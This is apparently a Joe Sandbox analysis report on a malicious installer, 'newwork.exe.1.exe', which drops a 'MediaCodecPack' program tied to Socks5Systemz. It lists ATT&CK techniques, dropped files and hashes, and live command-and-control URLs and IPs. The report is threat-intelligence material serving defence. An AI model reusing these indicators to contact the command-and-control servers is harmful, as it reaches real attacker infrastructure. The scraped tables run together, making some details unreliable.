                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609687A7 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_column_int64,sqlite3_reset,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,2_2_609687A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6095F7F7 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,2_2_6095F7F7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6092570B sqlite3_bind_double,sqlite3_mutex_leave,2_2_6092570B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6095F772 sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095F772
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60925778 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,2_2_60925778
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6090577D sqlite3_bind_parameter_name,2_2_6090577D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094B764 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,2_2_6094B764
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6090576B sqlite3_bind_parameter_count,2_2_6090576B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094A894 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,2_2_6094A894
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6095F883 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095F883
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094C8C2 sqlite3_value_int,sqlite3_value_int,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_null,sqlite3_bind_null,sqlite3_step,sqlite3_reset,2_2_6094C8C2
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096281E sqlite3_mprintf,sqlite3_vtab_config,sqlite3_malloc,sqlite3_mprintf,sqlite3_mprintf,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_exec,sqlite3_free,sqlite3_prepare_v2,sqlite3_bind_text,sqlite3_step,sqlite3_column_int64,sqlite3_finalize,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_errmsg,sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_mprintf,sqlite3_free,sqlite3_declare_vtab,sqlite3_errmsg,sqlite3_mprintf,sqlite3_free,2_2_6096281E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096583A memcmp,sqlite3_realloc,qsort,sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_step,sqlite3_reset,2_2_6096583A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6095F9AD sqlite3_bind_int,sqlite3_step,sqlite3_column_type,sqlite3_reset,2_2_6095F9AD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094A92B sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6094A92B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6090EAE5 sqlite3_transfer_bindings,2_2_6090EAE5
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6095FB98 sqlite3_value_int,sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset,2_2_6095FB98
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6095ECA6 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,2_2_6095ECA6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6095FCCE sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,2_2_6095FCCE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6095FDAE sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,2_2_6095FDAE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60966DF1 sqlite3_value_text,sqlite3_mprintf,sqlite3_free,strcmp,sqlite3_free,sqlite3_malloc,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset,sqlite3_column_blob,sqlite3_reset,sqlite3_malloc,sqlite3_free,sqlite3_reset,sqlite3_result_error_code,sqlite3_result_blob,2_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60969D75 sqlite3_bind_int,sqlite3_step,sqlite3_column_int,sqlite3_reset,2_2_60969D75
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6095FFB2 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,2_2_6095FFB2
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    2
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Command and Scripting Interpreter
                    5
                    Windows Service
                    1
                    DLL Side-Loading
                    3
                    Obfuscated Files or Information
                    LSASS Memory1
                    Account Discovery
                    Remote Desktop Protocol1
                    Input Capture
                    21
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution
                    1
                    Bootkit
                    1
                    Access Token Manipulation
                    21
                    Software Packing
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook5
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS35
                    System Information Discovery
                    Distributed Component Object ModelInput Capture1
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets151
                    Security Software Discovery
                    SSHKeylogging12
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials1
                    Process Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync121
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Process Injection
                    Proc Filesystem1
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Bootkit
                    /etc/passwd and /etc/shadow3
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    newwork.exe.1.exe16%ReversingLabsWin32.Trojan.Munp
                    SourceDetectionScannerLabelLink
                    C:\ProgramData\MediaCodecPack\MediaCodecPack.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe100%Joe Sandbox ML
                    C:\ProgramData\MediaCodecPack\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\gdiplus.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-2R56A.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-7LIEI.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-NF7R8.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-R0E3S.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-RNN6Q.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcp71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\msvcr71.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\sqlite3.dll (copy)0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_setup64.tmp0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\is-SKUV2.tmp\_isetup\_shfoldr.dll0%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5b100%Avira URL Cloudmalware
                    https://188.119.66.185/405117-2476756634-1002W=0%Avira URL Cloudsafe
                    https://188.119.66.185/040%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388a100%Avira URL Cloudmalware
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325100%Avira URL Cloudmalware
                    http://wonderwork.ucoz.com/0%Avira URL Cloudsafe
                    https://188.119.66.185/allowedCert_OS_10%Avira URL Cloudsafe
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4100%Avira URL Cloudmalware
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5bfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388afalse
                    • Avira URL Cloud: malware
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.innosetup.com/newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.drfalse
                      high
                      https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      https://188.119.66.185/04mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.remobjects.com/psUnewwork.exe.1.exe, 00000000.00000003.1696785947.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696594299.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.drfalse
                        high
                        https://188.119.66.185/priseCertificatesmediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUnewwork.exe.1.exefalse
                            high
                            https://188.119.66.185/rosoftmediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://188.119.66.185/mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinenewwork.exe.1.exefalse
                                  high
                                  https://188.119.66.185/405117-2476756634-1002W=mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://wonderwork.ucoz.com/newwork.exe.1.tmp, 00000001.00000002.3557131784.00000000059AC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000000.1708971445.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.2.dr, mediacodecpack.exe.1.dr, is-F43ND.tmp.1.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000002.3555972784.000000000092E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.remobjects.com/psnewwork.exe.1.exe, 00000000.00000003.1696785947.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696594299.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.drfalse
                                    high
                                    https://www.easycutstudio.com/support.htmlnewwork.exe.1.exe, 00000000.00000003.1696268555.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000002.3556231844.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696174472.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1698014219.0000000003100000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.3556862399.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1698150930.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.3556348257.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://188.119.66.185/allowedCert_OS_1mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      46.8.225.74
                                      unknownRussian Federation
                                      28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                                      188.119.66.185
                                      unknownRussian Federation
                                      209499FLYNETRUfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1577462
                                      Start date and time:2024-12-18 13:56:11 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 10s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Run with higher sleep bypass
                                      Number of analysed new started processes analysed:7
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:newwork.exe.1.exe
                                      Detection:MAL
                                      Classification:mal96.troj.evad.winEXE@5/26@0/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 92%
                                      • Number of executed functions: 192
                                      • Number of non-executed functions: 269
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: newwork.exe.1.exe
                                      No simulations
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      46.8.225.74steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                        AbC0LBkVhr.exeGet hashmaliciousSocks5SystemzBrowse
                                          KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                            AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                              6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                  188.119.66.185stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                    steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                      steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                        Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                          GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                            GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                              bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                  Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    No context
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    FIORD-ASIP-transitoperatorinRussiaUkraineandBalticssteel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 46.8.225.74
                                                                    AbC0LBkVhr.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 46.8.225.74
                                                                    KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                    • 46.8.225.74
                                                                    AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                    • 46.8.225.74
                                                                    6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                    • 46.8.225.74
                                                                    j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                                                                    • 46.8.225.74
                                                                    b3astmode.arm5.elfGet hashmaliciousMiraiBrowse
                                                                    • 109.248.108.147
                                                                    reduce.exeGet hashmaliciousGO BackdoorBrowse
                                                                    • 46.8.236.61
                                                                    InsertSr.exeGet hashmaliciousGO BackdoorBrowse
                                                                    • 46.8.236.61
                                                                    iKhdG3bwZK.exeGet hashmaliciousGO BackdoorBrowse
                                                                    • 46.8.236.61
                                                                    FLYNETRUstail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    Ni2ghr9eUJ.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    51c64c77e60f3980eea90869b68c58a8stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    cd#U9988.exeGet hashmaliciousUnknownBrowse
                                                                    • 188.119.66.185
                                                                    Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                    • 188.119.66.185
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    C:\ProgramData\MediaCodecPack\sqlite3.dllstail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                      steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                        steel.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                          AbC0LBkVhr.exeGet hashmaliciousSocks5SystemzBrowse
                                                                            Oz2UhFBTHy.exeGet hashmaliciousSocks5SystemzBrowse
                                                                              GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                GEm3o8pION.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                  bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                    bzX2pV3Ybw.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                      Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):3193465
                                                                                      Entropy (8bit):6.245419881846555
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:IG+iVWmBka3ISMod7hra7Xq1WkWkQW8uEFk:B1VWIkOISM89ra7Xq1WkW4rJ
                                                                                      MD5:49FC2D4BA26F2EEF94CCC6B71EB0AD96
                                                                                      SHA1:BC2B35A763A9B6EF1CDB599FE1AD5933B528E9E0
                                                                                      SHA-256:FD66C66EF0DAD6BAA7DE9CFA8CD552D8D44DFB09531110EF3CE9D7B851BB5E0B
                                                                                      SHA-512:73A58CB7F609F1BD049EEDDA9D295D07437E35D2D17ACC6C5D4A774710A50C134770031800033A943898E6848358DBC573168CBC199DF4848F46CDD7C5936BD3
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      Reputation:low
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................PE..L.....bg.................j...D.......#............@...........................1.....m.0.....................................4........ .................................................................................\............................aitt4...h.......j.................. ..`.ajtt4...-...........n..............@..@.aktt4...d.......0..................@....rsrc........ ......................@..@.altt4...@......y>...|..............`./.........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):645592
                                                                                      Entropy (8bit):6.50414583238337
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                      MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                      SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                      SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                      SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: stail.exe.3.exe, Detection: malicious, Browse
                                                                                      • Filename: steel.exe.3.exe, Detection: malicious, Browse
                                                                                      • Filename: steel.exe.3.exe, Detection: malicious, Browse
                                                                                      • Filename: AbC0LBkVhr.exe, Detection: malicious, Browse
                                                                                      • Filename: Oz2UhFBTHy.exe, Detection: malicious, Browse
                                                                                      • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                                      • Filename: GEm3o8pION.exe, Detection: malicious, Browse
                                                                                      • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                                                      • Filename: bzX2pV3Ybw.exe, Detection: malicious, Browse
                                                                                      Reputation:high, very likely benign file
